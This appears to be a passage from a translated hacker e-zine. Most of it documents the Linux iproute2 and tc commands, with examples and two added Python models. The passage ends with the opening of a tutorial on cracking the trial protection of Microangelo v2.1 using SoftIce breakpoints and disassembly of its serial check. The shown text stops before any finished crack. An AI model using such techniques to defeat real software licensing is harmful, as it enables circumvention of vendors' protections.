       splitting of traffic will happen only on the basis of traffic.
       equalize works only on patched kernels (?)

 Example:


 ip route add 192.168.0.0/24 dev eth0 src 192.168.0.4
 ip route add 192.168.1.0/24 dev eth1
 ip route add 193.200.17.97 dev eth0 src 193.200.17.103 onlink
 ip route add 193.200.17.101 dev eth0 src 193.200.17.103 onlink
 ip route add 193.200.17.98 dev eth0  src 193.200.17.103 onlink
 ip route add 193.200.17.105 via 193.200.17.98   src 193.200.17.103
 ip route add 193.200.17.102 via 193.200.17.98   src 193.200.17.103
 ip route add default via 193.200.17.97 src 193.200.17.103

 Here we have a machine with 2 network cards that has 3 addresses:
 192.168.1.1 on eth1, and 192.168.0.4 and 193.200.17.103 on eth0. It is a
 samba server on the network, and when it makes connections to 192.168.xx it
 uses its 192.168.xx addresses, while when it connects to real addresses it
 uses its real address. It also has 2 hosts that it reaches through another
 router (193.200.17.98) rather than through its main one (193.200.17.97), as
 well as 3 machines that are on the lan too.

 Another example:

 ip route add default scope global nexthop dev ppp0 nexthop dev ppp1

 Here the default route is split evenly between ppp0 and ppp1, i.e. load
 balancing is done.

 ip route add default equalize scope global nexthop via 193.200.17.98 nexthop via 193.200.17.99

 Here the same thing is achieved as in the example above, but the better way
 is used - with IP addresses, because the names of the interfaces are
 dynamic - and equalisation is used.


 ip route delete has options similar to ip route add, with the difference
 that the route with the same options as those given to the command is
 deleted; it is not necessary, however, to give all the options of that
 route in full if there are no others like it in the routing table.


 ip route show also has similar options, but it lists the routes that have
 similar parameters.

 Here is an example:
 eosnw:~# ip route show
 193.200.17.97 dev eth0  scope link
 193.200.17.98 dev eth0  scope link
 193.200.17.101 dev eth0  scope link
 193.200.17.102 via 193.200.17.98 dev eth0  src 193.200.17.103
 193.200.17.105 via 193.200.17.98 dev eth0  src 193.200.17.103
 192.168.1.0/24 dev eth1  proto kernel  scope link  src 192.168.1.1
 192.168.0.0/24 dev eth0  proto kernel  scope link  src 192.168.0.4
 default via 193.200.17.97 dev eth0  src 193.200.17.103

 Here the routes to 192.168.xx were added by the kernel, because ifconfig on
 2.2.x kernels automatically adds a route to address/netmask through that
 interface.


 ip route flush differs from ip route show only in that it deletes all the
 routes that have parameters like those given to the command.

 ip route get checks through which route a packet with properties like those
 given to the command will go. (Attention! This is not the same as ip route
 show... - with rules and so on the result may be different. ip route get
 repeats the kernel's actions when it looks up the routing tables.)


 ip rule lets you set rules on the basis of which look-ups are done in other
 routing tables - this way routing can be based not only on the destination
 address but also on the source address, on ToS, on the incoming interface.
 ip rule has several possible commands: add, delete and show.

 These rules can be of the following types:

    unicast -- Returns a route from the routing table the rule points to.
    blackhole -- Drops the packets directly.
    unreachable -- Returns the error "Network is unreachable".
    prohibit -- Returns the error "Communication is administratively prohibited".
    nat -- The rule translates the source address.



 ip rule add has the following options:


    type TYPE (default)

    -- type of the rule.

    from PREFIX

    -- Source address of the packet.

    to PREFIX

    -- destination address of the packet.

    iif NAME

    -- selects the incoming interface. If the interface is the loopback, the
    rule covers only packets sent by this host. This way separate routing
    tables can be made for packets sent by the host and for forwarded
    packets, and so the two kinds of traffic are separated completely.

    tos TOS or dsfield TOS

    -- self-explanatory.

    fwmark MARK

    -- which fwmark the rule applies to.
 <[  Note: fwmark is the ability, with ipchains, to put a so-called fwmark
 on particular packets, i.e. to do routing on the basis of ipchains rules
 .... ]>


    priority PREFERENCE

    -- priority of the rule. Every rule should have a unique, explicitly
       set priority.

<[
 Note:

 In fact, for historical reasons ip rule add does not require any priority.
 If the user does not specify a priority, the kernel chooses one itself, and
 if he specifies a priority that already exists, the rule is placed before
 all older rules with the same priority.

 As Kuznetzov says: "It is mistake in design, not more. And it will be
 fixed  one  day,  so  that  do  not  rely  on  this  feature,  use  explicit
 priorities."
]>

    table TABLEID

    -- routing table to look up in if the packet matches the rule.

    realms FROM/TO

    -- 'Realms' to use if the packet matches the rule.

    nat ADDRESS

    -- Base of the block of IP addresses for translating the source address.
    ADDRESS can be either the start of a block of IP addresses selected by
    NAT routes, or a local address (or even zero). In the last case the
    router does not translate them but masks them with this address.

 Examples:
 ip rule add from 192.203.80.0/24 table 13 prio 220

 This routes everything from 192.203.80.0/24 through the rules of table 13.

 ip rule add iif eth0 from 192.168.1.0/24 type blackhole prio 100

 This drops all packets received through eth0 from addresses 192.168.1.0/24.

 ip rule del iif eth0 prio 100

 This deletes the previous rule.


 ip rule show displays a list of the rules defined so far.

 Example:

 eosnw:~# ip rule show
 0:      from all lookup local
 100:    from 192.168.1.0/0 iif eth0 lookup main blackhole
 32766:  from all lookup main
 32767:  from all lookup 253
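
 How rules, tables and the entry types described above interact during one
 look-up (what ip route get reports) is easier to see in a small model. This
 is an added example, not code from the article or from iproute2: it is a
 simplified model (longest prefix only, no ToS, metric, fwmark or local
 table), table 13's contents and the 10.66.0.0/16 entry are constructed, and
 EINVAL for a blackhole rule is an assumption based on kernel behaviour.

```python
import ipaddress

# Error each entry type produces, as listed in the article's notes.
ROUTE_ERRORS = {"unreachable": "EHOSTUNREACH", "blackhole": "EINVAL",
                "prohibit": "EACCES"}
# Rule types; EINVAL for blackhole is an assumption (kernel behaviour).
RULE_ERRORS = {"unreachable": "ENETUNREACH", "blackhole": "EINVAL",
               "prohibit": "EACCES"}

# Tables: id -> list of (prefix, type, next hop). "main" follows the
# article's "ip route show" output; the prohibit entry and the whole of
# table 13 are constructed for the example.
TABLES = {
    "main": [
        ("192.168.1.0/24", "unicast", "dev eth1"),
        ("192.168.0.0/24", "unicast", "dev eth0"),
        ("193.200.17.102/32", "unicast", "via 193.200.17.98"),
        ("10.66.0.0/16", "prohibit", None),
        ("0.0.0.0/0", "unicast", "via 193.200.17.97"),
    ],
    "13": [
        ("192.168.0.0/16", "throw", None),
        ("0.0.0.0/0", "unicast", "via 10.13.0.1"),
    ],
}

# The two rules from the article's examples plus the default "main" rule.
RULES = [
    {"prio": 32766, "type": "unicast", "table": "main"},
    {"prio": 100, "type": "blackhole", "iif": "eth0",
     "from": "192.168.1.0/24"},
    {"prio": 220, "type": "unicast", "from": "192.203.80.0/24",
     "table": "13"},
]


def lookup_table(table, dst):
    """Longest-prefix match inside one table; returns the entry or None."""
    best = None
    for prefix, rtype, nexthop in table:
        net = ipaddress.ip_network(prefix)
        if dst in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, rtype, nexthop)
    return best


def route_get(src, dst, iif=None, rules=None, tables=None):
    """Returns (result, next hop, priority of the rule that decided).

    result is "route" or an errno name. iif=None means a locally
    generated packet, so rules with an iif selector do not match it.
    """
    rules = RULES if rules is None else rules
    tables = TABLES if tables is None else tables
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in sorted(rules, key=lambda r: r["prio"]):
        if src not in ipaddress.ip_network(rule.get("from", "0.0.0.0/0")):
            continue
        if "iif" in rule and rule["iif"] != iif:
            continue
        if rule["type"] != "unicast":
            # blackhole / unreachable / prohibit rules end the look-up.
            return (RULE_ERRORS[rule["type"]], None, rule["prio"])
        hit = lookup_table(tables.get(rule["table"], []), dst)
        if hit is None or hit[1] == "throw":
            # No route here, or "throw": pretend this table has no route
            # and go on to the next rule.
            continue
        _, rtype, nexthop = hit
        if rtype in ROUTE_ERRORS:
            return (ROUTE_ERRORS[rtype], None, rule["prio"])
        return ("route", nexthop, rule["prio"])
    return ("ENETUNREACH", None, None)


if __name__ == "__main__":
    for args in [("192.203.80.5", "8.8.8.8"),
                 ("192.203.80.5", "192.168.0.9"),
                 ("192.168.1.7", "193.200.17.102", "eth0"),
                 ("192.168.1.7", "193.200.17.102"),
                 ("192.168.0.4", "10.66.1.1")]:
        print(args, "->", route_get(*args))
```

 The second case is the throw entry at work: table 13 matches the packet's
 source, refuses 192.168.0.0/16, and the look-up falls through to main.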



 ip address allows adding/removing an address on an interface - this is what
 ip aliasing allowed, but in a much better form. Now you can have 10000
 vhosts on your machine without a single virtual interface. The command has
 4 possible subcommands: add, delete, show, flush.

 ip address add/delete have the following parameters:


    dev NAME

    -- The device to which the address is to be added.

    local ADDRESS (default)

    -- address of the interface. Its format depends on whether it is IPv4
    or IPv6 and it is written in the standard way for each. ADDRESS may be
    followed by '/' and a number, which directly assigns a whole network of
    addresses to the interface.

    peer ADDRESS

    -- address of the remote endpoint. As with local, '/' and a number can
    be used to define the netmask of the address. If such an address is
    given, the local address cannot have /xx.

    broadcast ADDRESS

    -- broadcast address for the interface.

    It is possible to use '+' and '-' instead of the address itself. In
    that case the broadcast address is computed by setting/clearing the
    bits in the host part of the interface address.

    label NAME

    -- Each address can be given its own device label. To keep
    compatibility with linux-2.0 aliases, this string must match the name
    of the interface or be the name of the interface followed by ':' and a
    number.

    scope SCOPE_VALUE

    -- 'scope' of the zone in which this address is valid. The possible
    scopes are listed in the file /etc/iproute2/rt_scopes. Special such
    values are:

        global -- the address is globally valid.
        site -- (IPv6 only) valid only within this site.
        link -- valid only on this device.
        host -- valid only on this host.

 Examples:
 ip address add 192.168.0.1 dev eth0
 ip address add 192.168.1.1 dev eth0
 ip address add 192.168.2.1 dev eth0

 ip route add 192.168.0.0/24 dev eth0 src 192.168.0.1
 ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1
 ip route add 192.168.2.0/24 dev eth0 src 192.168.2.1

 Here, for example, 3 logical networks are created on top of one physical
 one, and they can work independently of each other and be shaped and
 accounted independently, and so on.

 Another example:
 ip address add 194.12.235.195 dev eth0
 ip address add 194.12.235.199 dev eth0 label eth0:0

 This gives eth0 the primary address 194.12.235.195 and creates the alias
 eth0:0 with the address 194.12.235.199.

 ip address show/flush have identical parameters and differ only in that one
 command shows the addresses matching the criterion given to the command,
 while the other deletes them. The possible parameters are:

    dev NAME (default)

    -- name of the interface.

    scope SCOPE_VAL

    -- only the addresses in this 'scope'.

    to PREFIX

    -- only addresses matching this PREFIX.

    label PATTERN

    -- only addresses whose name matches PATTERN. PATTERN is a normal
    shell pattern (eth*, eth1:?)

    dynamic and permanent

    -- (IPv6 only) Shows static or dynamic addresses.

    tentative

    -- (IPv6 only) only addresses that do not pass the duplicate address
    test.

    deprecated

    -- (IPv6 only) only obsolete (unneeded) addresses.

    primary and secondary

    -- only primary (or secondary) addresses.

 Examples:
 eosnw:~# ip address show
 1: lo: <LOOPBACK,UP> mtu 3924 qdisc noqueue
     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
     inet 127.0.0.1/8 scope host lo
 2: teql0: <NOARP> mtu 1500 qdisc noop qlen 100
     link/generic
 3: eth0: <BROADCAST,MULTICAST,PROMISC,UP> mtu 1500 qdisc pfifo_fast qlen 100
     link/ether 00:20:af:3c:07:f7 brd ff:ff:ff:ff:ff:ff
     inet 192.168.0.4/24 brd 192.168.0.255 scope global eth0
     inet 193.200.17.103/32 scope global eth0
 4: eth1: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
     link/ether 00:20:af:3c:08:0f brd ff:ff:ff:ff:ff:ff
     inet 192.168.1.1/24 brd 192.168.1.255 scope global eth1

 This way all interfaces are shown ...

 eosnw:~# ip address show label "eth*"
 3: eth0: <BROADCAST,MULTICAST,PROMISC,UP> mtu 1500 qdisc pfifo_fast qlen 100
     link/ether 00:20:af:3c:07:f7 brd ff:ff:ff:ff:ff:ff
     inet 192.168.0.4/24 brd 192.168.0.255 scope global eth0
     inet 193.200.17.103/32 scope global eth0
 4: eth1: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
     link/ether 00:20:af:3c:08:0f brd ff:ff:ff:ff:ff:ff
     inet 192.168.1.1/24 brd 192.168.1.255 scope global eth1

 And this way only those that are named eth*.


 Another thing that can be done with the ip command is to create so-called
 tunnels - for example of the IPv6-in-IPv4 type (which allow networks/hosts
 that have a direct link only to networks/hosts supporting IPv4 to use IPv6
 by going through another place that supports IPv6).

 ip tunnel manipulates these so-called tunnels. This command has the
 following subcommands: add, change, delete, show.

 ip tunnel add/change/delete has the following options:

    name NAME (default)

    -- Sets the name "NAME" of the tunnel.

    mode MODE

    -- Sets the type of the tunnel. The ones that exist at the moment are
    ipip, sit and gre.
<[
 Note:

 IPIP tunnels are a standard encapsulation of a packet in a packet. GRE
 tunnels are a creation of CISCO, which it is advisable to use if the remote
 end is a CISCO router; this protocol also supports multicast inside the
 tunnel itself. ( and after all CISCO remain the specialists in this
 area :) )
]>

    remote ADDRESS

    -- Sets the address of the remote end of the tunnel.

    local ADDRESS

    -- Sets a fixed source address for the packets sent through the tunnel.
    This address must be an address of some interface on the machine.

    ttl N

    -- Sets a fixed TTL for the tunnelled packets. N is a number from 1 to
      255. 0 is a special value meaning that the packet does not change its
      TTL.

    tos T or dsfield T

    -- Sets a fixed TOS "T" for the tunnelled packets. By default it is not
    changed.

    dev NAME

    -- Binds the tunnel to the interface NAME, so that the packets do not go
    through other interfaces if the routing changes.

    nopmtudisc

    -- Removes Path MTU Discovery for the tunnel, which is enabled by
    default. This option is incompatible with a fixed TTL: a tunnel with a
    fixed TTL always does Path MTU discovery.

    key K, ikey K, okey K

    -- (GRE tunnels only) use 'keyed' GRE with key K. K is either a number
    or an IP address. The key parameter sets the key to use in both
    directions, while ikey and okey set it, respectively, only for outgoing
    or only for incoming packets.

    csum, icsum, ocsum

    -- (GRE tunnels only) checksum verification for the tunnelled packets.
    ocsum checks only the outgoing packets, and icsum only the incoming
    packets. csum is equivalent to the combination of the two flags icsum
    and ocsum.

    seq, iseq, oseq

    -- (GRE tunnels only) 'Serialise' the packets. Here again oseq/iseq
    enable this option for incoming/outgoing packets respectively.

<[
  Note:

 According to A. Kuznetzov, this option does not work, or at least has not
 been tested. It is also not known exactly how it is supposed to work or
 what exactly CISCO intended to use this option for.
]>

 ip tunnel show displays the tunnels that exist at the moment.


<[ What follows below is Renegade's work on traffic control ]>

 Traffic Control

 With this I would like to shed a little light on the support for Traffic
 Control and Quality of Service in the 2.2.x kernels.

 To compile the kernel with this support, Class Based Queueing (CBQ), Token
 Bucket Flow (TBF), Traffic Shapers, as well as RED, must be compiled into
 the kernel or as modules.

 After that, iproute2 is needed in order to use these functions of the
 kernel. It can be downloaded from ftp://ftp.sunet.se/pub/Linux/ip-routing

 The principle on which traffic control (tc) works is the following:
 incoming packets are checked to see whether they are for the given node,
 and if so, they are passed for processing to a higher layer. Otherwise the
 routing table is consulted to determine the next hop for the packet.
 Likewise, the higher layer can also generate traffic, which makes the
 forwarding agent processes look for the next hop. When that happens, the
 forwarding agent puts the packet on the output interface for transmission;
 it is exactly here that linux traffic control starts to do its work.

 Linux Traffic Control is based on 3 basic blocks:
     - Queueing discipline
     - Classes
     - Filters

 1. Queueing (queues)

 Every interface has a way of handling the queues associated with it. The
 simplest is FIFO. There are several types of queueing that are supported
 at the moment:

 Class Based Queue
 Token Bucket Flow
 CSZ
 First In First Out
 Priority
 TEQL
 SFQ
 ATM
 RED

 Some of these disciplines use filters to classify packets into different
 classes and handle them accordingly. This lets one packet take priority
 over another. Examples are FIFO, CBQ.

 Queueing disciplines and classes are tied to each other. The presence of
 classes is a fundamental option of the queueing discipline. Filters, too,
 can be combined with queueing disciplines and classes.

 Classes

 Queues and classes are closely related. Every class has a queue. Classes
 are identified by a class ID and an internal ID. The class ID is assigned
 by the user, while the internal ID is assigned by the queueing discipline.
 The class ID has the structure major:minor. The major number points to the
 instance of the queueing discipline that the class depends on. The minor
 number identifies the class within that discipline.

 For more details see include/net/pkt_sched.h.


 TC (Traffic Controller)

 'tc' (traffic controller) is a user program which is, roughly speaking, a
 front end for creating queues and associating them with given output
 interfaces. It is used to create the various kinds of queues and to
 associate classes with each of these queues. It can also be used to set up
 filters based on the routing table, the u32 classifiers and the RSVP
 classifiers. It uses netlink sockets as the mechanism for communicating
 with the networking functions of the kernel.

 tc is used in the following way:

 tc [ OPTIONS ] OBJECT { COMMAND | help }
 where:   OBJECT := { qdisc | class | filter }
          OPTIONS := { -s[statistics] | -d[details] | -r[raw] }
 OBJECT can be a queueing discipline, a class or a filter

 Queueing discipline:

 The syntax for creating a queueing discipline is as follows:
 tc qdisc [ add | del | replace | change | get ] dev STRING
        [ handle QHANDLE ] [ root | parent CLASSID ]
        [ estimator INTERVAL TIME_CONSTANT ]
        [ [ QDISC_KIND ] [ help | OPTIONS ] ]

        tc qdisc show [ dev STRING ]
 Where:
 QDISC_KIND := { [p|b]fifo | tbf | prio | cbq | red | etc. }

 The handle is a unique handle given to the discipline by its creator. There
 cannot be two disciplines with the same handle.

 root indicates that the discipline is the root of the sharing hierarchy.
 parent indicates the parent of the discipline.

 To create a class based queue:

 tc qdisc [ add | del | replace | change | get ] dev STRING  \
 cbq bandwidth BPS [ avpkt BYTES ] [ mpu BYTES ] [ cell BYTES ] [ ewma LOG ]

 Where:
     bandwidth - the maximum speed of the given interface
     mpu - the minimum number of bytes to be sent in a packet

 Example:

 tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit allot 1514 cell 8 avpkt 1000 mpu 64

 In this example a Class Based Queue is created and attached to eth0. The
 handle is 1: (which is 1:0). The total available speed is 10Mbit.

 Classes

 The syntax for creating classes is as follows:

 tc class [ add | del | change | get ] dev STRING
          [ classid CLASSID ] [ root | parent CLASSID ]
          [ [ QDISC_KIND ] [ help | OPTIONS ] ]

 tc class show [ dev STRING ] [ root | parent CLASSID ]

 Where:
 QDISC_KIND := { prio | cbq | etc. }
 QDISC_KIND can be any of the queueing disciplines that support classes.

 The other fields are:
     classid: the handle given to this class by its creator.
     root: indicates that this class is the root class of the sharing
           hierarchy.
     parent: the handle of the parent of the given queueing discipline

 Class Based Queue

 To create a CBQ the syntax is as follows:

 cbq bandwidth BPS rate BPS maxburst PKTS [ avpkt BYTES ]
                [ minburst PKTS ] [ bounded ] [ isolated ]
                [ allot BYTES ] [ mpu BYTES ] [ weight RATE ]
                [ prio NUMBER ] [ cell BYTES ] [ ewma LOG ]
                [ estimator INTERVAL TIME_CONSTANT ]
                [ split CLASSID ] [ defmap MASK/CHANGE ]

 Where:
     bandwidth - the maximum speed available to the queueing discipline
                 this class belongs to
     rate - the speed allotted to this class
     avpkt - the average number of bytes in a packet for this class
     bounded - indicates that this class cannot "borrow" unused speed from
             its parent class.
     isolated - indicates that the class will not share speed with any
             other class.

 Let us look at an example:

 tc class add dev eth1 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate \
 1Mbit allot 1514 cell 8 weight 100Kbit prio 3 maxburst 20 avpkt 1000 \
 split 1:0 defmap c0

 In this example a CBQ class with handle 1:2 is created. Its parent is
 identified by handle 1:1. The average packet size is 1000 bytes. The split
 point is 1:0, which denotes the root of the sharing procedure.

 Filters:

 The syntax for creating filters is:
 tc filter [ add | del | change | get ] dev STRING
           [ prio PRIO ] [ protocol PROTO ]
           [ root | classid CLASSID ] [ handle FILTERID ]
           [ [ FILTER_TYPE ] [ help | OPTIONS ] ]

 tc filter show [ dev STRING ] [ root | parent CLASSID ]

 Where:

 FILTER_TYPE := { rsvp | u32 | fw | route | etc. }
 FILTERID := ... The format depends on the classifier

 prio - the priority of the given filter

 The remaining options were covered above.

 Route classifiers classify packets according to the routing table. The
 syntax is as follows:

 tc filter [add | del | change | get] dev STRING
           [parent PARENTID] [protocol PROTO]
           [prio PRIORITY]  route

 Where:

 PROTO = {ip | icmp | etc.}

 Here is an example:

 tc filter add dev eth0 parent 1:0 protocol ip prio 100 route

 To give rules to the filter:

 ip route add 129.237.125.150 via 129.237.125.146 dev eth0 flow 1:2

 Here a rule is set for IP 129.237.125.150 with gateway 129.237.125.146,
 with all of the traffic belonging to the class whose handle is 1:2

 And finally, after so much written nonsense, let me go through a real
 example.

 Let us have 3 computers: computer1, which has IP 10.10.10.149. Let the
 average packet size be 1000 bytes. And let us have 2 classes: one for the
 traffic to the machine with IP 10.10.10.146 (computer2), and one for the
 traffic to machine 10.10.10.148 (computer3). In a word, the traffic to
 machines computer2 and computer3 is to be limited. The traffic to computer2
 has a higher priority than that to computer3. computer2 is allowed 1Mbps
 and computer3 - 5Mbps.

 On computer 1:
 --------------

 #Attach the qdisc to eth0 (the other two machines are connected there).
 #The maximum available speed is 10Mbit.
 tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit cell 8 avpkt 1000\
 mpu 64

 #Define the root class. It has 10Mbit.
 tc class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 10Mbit rate\
 10MBit allot 1514 cell 8 weight 1Mbit prio 8 maxburst 20 avpkt 1000

 #Traffic to computer2. The priority is 3 and the speed is 1Mbit.
 tc class add dev eth0 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate\
 1Mbit allot 1514 cell 8 weight 100Kbit prio 3 maxburst 20 avpkt 1000 split\
 1:0

 #Traffic to computer3. The priority is 7 and the speed is 5Mbit.
 tc class add dev eth0 parent 1:1 classid 1:3 cbq bandwidth 10Mbit rate\
 5Mbit allot 1514 cell 8 weight 800Kbit prio 7 maxburst 20 avpkt 1000 split\
 1:0

 #Install the route classifier
 tc filter add dev eth0 parent 1:0 protocol ip prio 100 route

 #Add the route and rules for computer2
 ip route add 10.10.10.146 via 10.10.10.149 flow 1:2

 #Add the route and rules for computer3
 ip route add 10.10.10.148 via 10.10.10.149 flow 1:3
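
 Added example (not part of Renegade's article): a small Python check that
 reads the tc and ip commands of the worked example above and reports classes
 whose parent or qdisc is missing, rates above what the parent offers, and
 route flows that name an undefined class. The function names, the decimal
 rate units and the rule that children should not be allotted more than their
 parent's rate are assumptions of this example.

```python
import shlex

# Constructed input: the commands of the worked example above, one per line.
SAMPLE = """\
tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit cell 8 avpkt 1000 mpu 64
tc class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 10Mbit rate 10Mbit allot 1514 cell 8 weight 1Mbit prio 8 maxburst 20 avpkt 1000
tc class add dev eth0 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate 1Mbit allot 1514 cell 8 weight 100Kbit prio 3 maxburst 20 avpkt 1000 split 1:0
tc class add dev eth0 parent 1:1 classid 1:3 cbq bandwidth 10Mbit rate 5Mbit allot 1514 cell 8 weight 800Kbit prio 7 maxburst 20 avpkt 1000 split 1:0
tc filter add dev eth0 parent 1:0 protocol ip prio 100 route
ip route add 10.10.10.146 via 10.10.10.149 flow 1:2
ip route add 10.10.10.148 via 10.10.10.149 flow 1:3
"""

# Assumption: decimal units, 1 Kbit = 1000 bit/s and 1 Mbit = 1,000,000 bit/s.
UNITS = {"mbit": 1_000_000, "kbit": 1_000, "bit": 1}


def parse_rate(text):
    """Convert a rate such as '10Mbit' or '100Kbit' to bits per second."""
    low = text.lower()
    for suffix, factor in UNITS.items():
        if low.endswith(suffix) and low[: -len(suffix)].isdigit():
            return int(low[: -len(suffix)]) * factor
    raise ValueError(f"unsupported rate: {text!r}")


def parse_handle(text):
    """Parse 'major:minor' (hexadecimal); an empty minor is 0, so '1:' is '1:0'."""
    major, sep, minor = text.partition(":")
    if not sep or not major:
        raise ValueError(f"bad handle: {text!r}")
    return int(major, 16), int(minor or "0", 16)


def fmt(handle):
    return f"{handle[0]:x}:{handle[1]:x}"


def need(tokens, key):
    """Return the token that follows keyword `key`; a missing keyword is an error."""
    if key not in tokens[:-1]:
        raise ValueError(f"missing '{key}' in: {' '.join(tokens)}")
    return tokens[tokens.index(key) + 1]


def lint(script):
    """Return a list of findings (strings); an empty list means consistent."""
    qdiscs, classes, flows, route_filters = {}, {}, [], set()
    # Join backslash-continued lines first, then drop '#' comments per line.
    for line in script.replace("\\\n", " ").splitlines():
        t = shlex.split(line, comments=True)
        if len(t) < 4:
            continue
        if t[:3] == ["tc", "qdisc", "add"]:
            qdiscs[parse_handle(need(t, "handle"))] = parse_rate(need(t, "bandwidth"))
        elif t[:3] == ["tc", "class", "add"]:
            classes[parse_handle(need(t, "classid"))] = (
                parse_handle(need(t, "parent")), parse_rate(need(t, "rate")))
        elif t[:3] == ["tc", "filter", "add"] and t[-1] == "route":
            route_filters.add(parse_handle(need(t, "parent")))
        elif t[:3] == ["ip", "route", "add"] and "flow" in t:
            flows.append((t[3], parse_handle(need(t, "flow"))))

    findings, child_sum = [], {}
    for cid, (parent, rate) in classes.items():
        root = (cid[0], 0)  # the qdisc instance named by the major number
        if root not in qdiscs:
            findings.append(f"class {fmt(cid)}: no qdisc with handle {cid[0]:x}:")
        elif rate > qdiscs[root]:
            findings.append(f"class {fmt(cid)}: rate exceeds the qdisc bandwidth")
        if parent not in classes and parent not in qdiscs:
            findings.append(f"class {fmt(cid)}: parent {fmt(parent)} is not defined")
        child_sum[parent] = child_sum.get(parent, 0) + rate
    for parent, total in child_sum.items():
        if parent in classes and total > classes[parent][1]:
            findings.append(f"children of {fmt(parent)} are allotted more than its rate")
    for dest, cid in flows:
        if cid not in classes:
            findings.append(f"route to {dest}: flow {fmt(cid)} names no defined class")
        elif (cid[0], 0) not in route_filters:
            findings.append(f"route to {dest}: no route filter on qdisc {cid[0]:x}:")
    return findings


if __name__ == "__main__":
    for finding in lint(SAMPLE) or ["no findings"]:
        print(finding)
```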

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#11ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Cracking Microangelo v2.1                                            K.E.
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

   "(B.Red: hey, so this guy... has dumped the whole source on us again...
   But do take an example from him - he writes some more interesting
   program, slaps together a .txt on how he wrote it, and it becomes an
   article. Is that really so hard?)"
                                                                 Phm 19
 Well, it isn't hard. Here, we are taking the example.

 I don't think I'm the most suitable person to teach people cracking, since
 I still have a lot to learn myself, but since the people who understand
 this stuff keep quiet or wait for a special invitation (see GaBOSS's
 message of [Wed Jun 30 20:08:50 1999] in the Phreedom MessageBoard), so be
 it.

 Then again, maybe since I am a "newbie" my explanations will be more
 accessible to people, I hope...

 What is this about? We have a program (Microangelo 2.1 by Impact Software,
 www.impactsoft.com) that causes us trouble by brazenly announcing that it
 intends to work for 30 days and then recommend us the "Lubo Penev"
 speciality (some also call it "Monika" :). But we just happen to have the
 following tools: SoftIce, W32Dasm, TASM, brain..., and we don't agree at
 all with that prospect (the soup one).

     Step 1: Gathering initial information about the program
     -------------------------------------------------------

 Microangelo is an editor for icons and animated cursors for Win. It
 consists of several modules (EXEs), which can be run on their own or call
 one another - Microangelo Animator, Microangelo Browser, Microangelo
 Engineer, Microangelo Librarian and Microangelo Studio. Almost all of them
 have a "Register" command in the File menu, with the exception of the
 Browser, which has no menus at all. In the dir where it gets installed
 there is also a DLL (Muapp.dll), which is used by all the modules - this
 can be seen with QuickView or with W32Dasm, the difference being that
 QuickView is faster, since we don't wait for the exe to be disassembled,
 but in return W32Dasm repays the wait with additional information - the
 names of the exported/imported functions, the most interesting of which is
 KnockKnock. But we won't go down that road now, because next comes:

     Step 2: Penetration
     -------------------

 I don't mean the anal kind or anything like it, but penetration with a
 breakpoint. We start SoftIce and set a BPX on the more popular functions:

     bpx GetWindowText
     bpx GetWindowTextA
     bpx GetDlgItemText
     bpx GetDlgItemTextA

 It turns out that the one we need is the last one, and that is logical,
 because the program is 32-bit and the serial number is entered in a dialog
 window, but it is still a good idea to try all four, because surprises and
 exceptions to the rules do happen.

 So, we set a breakpoint on GetDlgItemTextA and type our favourite name and
 number. I'll try with "Phreedom" and "123456789". We press OK and find
 ourselves in SoftIce, at the start of GetDlgItemTextA. We press F5 to leave
 SoftIce, but immediately find ourselves in it again - two calls to the
 function, to read first the name and then the number. Now we press F11 to
 see who it is that calls GetDlgItemTextA.

 If anyone is wondering what these F-keys I keep pressing are, they should
 know that I use SoftIce's default settings for the function keys, where F5
 is equivalent to the command "x" typed on the command line (exit), and F11
 is "G @SS:ESP" - it sets a temporary breakpoint at the address that is on
 top of the stack, and makes sense only when you are on the first
 instruction of some call and the Return Address that was just pushed is on
 top of the stack. The result of F11 is then that you "leave" the call
 without losing control over the execution of the program (relatively
 speaking, but for the WinAPI case it is true).

 After we leave GetDlgItemTextA, from the SoftIce status we learn that we
 are in the code of muapp.dll (MUAPP!.text+18FD) and we see the following:

   0137:100028E3  PUSH    10008310                    ; the name
   0137:100028E8  PUSH    000003ED
   0137:100028ED  MOV     EDI,[USER32!GetDlgItemTextA]
   0137:100028F3  PUSH    ESI
   0137:100028F4  CALL    EDI
   0137:100028F6  PUSH    0A
   0137:100028F8  PUSH    10008180                    ; reg#
   0137:100028FD  PUSH    000003EE
   0137:10002902  PUSH    ESI
   0137:10002903  CALL    EDI
   0137:10002905  CMP     BYTE PTR [10008180],50      ; does it start with 'P'
   0137:1000290C  JNZ     10002915
   0137:1000290E  MOV     EBP,00000001
   0137:10002913  JMP     10002937
   0137:10002915  CMP     BYTE PTR [10008180],54      ; or with 'T'
   0137:1000291C  JNZ     10002925
   0137:1000291E  MOV     EBP,00000002
   0137:10002923  JMP     10002937
   0137:10002925  CMP     BYTE PTR [10008180],53      ; or 'S'
   0137:1000292C  JNZ     10002A11                    ; sorry if not
   0137:10002932  MOV     EBP,00000003

 We are at address 10002905, having just left that call edi, which, if we
 look a little higher up, we see is in fact call User32!GetDlgItemTextA. We
 look at the parameters passed to this function in its two calls, to learn
 the addresses where our name and number are. We check with the command
 "d address", in this case "d 10008310" and "d 10008180". Between the two
 commands it is a good idea to switch the data window, so that we can keep
 an eye on both.

 SoftIce has 4 different data windows, which are switched with the command
 "data" (a good idea is to bind this command to the F1 key, because by
 default it is "h" (help) and is completely useless). Each data window
